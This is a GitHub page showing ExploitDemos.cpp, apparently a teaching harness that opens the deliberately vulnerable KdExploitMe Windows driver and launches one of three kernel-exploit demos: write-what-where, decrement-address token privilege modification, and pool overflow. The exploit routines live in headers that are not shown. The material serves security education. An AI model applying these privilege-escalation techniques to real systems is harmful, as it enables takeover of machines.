-
Notifications
You must be signed in to change notification settings - Fork 91
/
Copy pathExploitDemos.cpp
87 lines (66 loc) · 1.48 KB
/
ExploitDemos.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#pragma once
#include "stdafx.h"
#include "GenericAttacks.h"
#include "PoolOverflow.h"
#include "KernelAddressLeak.h"
#include <string>
using namespace std;
void PrintHelpMenu()
{
printf("ExploitDemos Help:\n");
printf("Demonstrates exploiting the KdExploitMe driver.\n");
printf("--------------\n");
printf("ExploitDemos.exe -ExploitNumber\n");
printf(" -01 : Demo METHOD_WRITEWHATWHERE - NULL EPROCESS ACL.\n");
printf(" -02 : Demo METHOD_DECADDRESS - Modify token privileges.\n");
printf(" -03 : Demo METHOD_OVERFLOWPOOL - 0xbad0b0b0, Non-Paged Pool, 64bit only.\n");
}
int _tmain(int argc, _TCHAR* argv[])
{
string dummy = NULL;
if (argc != 2)
{
PrintHelpMenu();
return -1;
}
printf("Press any key and hit enter to continue...\n");
cin >> dummy;
HANDLE hDevice;
DWORD errNum;
UNREFERENCED_PARAMETER(argc);
UNREFERENCED_PARAMETER(argv);
//
// open the device
//
if ((hDevice = CreateFile(L"\\\\.\\KdExploitMe",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL)) == INVALID_HANDLE_VALUE) {
errNum = GetLastError();
printf("- CreateFile failed! Error code = 0x%x\n", errNum);
return 0;
}
int exploitNumber = stoi(argv[1]+1);
switch (exploitNumber)
{
case 1:
AttackWriteWhatWhere(hDevice);
break;
case 2:
AttackDecAddress(hDevice);
break;
case 3:
AttackPO_BAD0B0B0(hDevice);
break;
default:
PrintHelpMenu();
break;
}
//
// close the handle to the device.
//
CloseHandle(hDevice);
}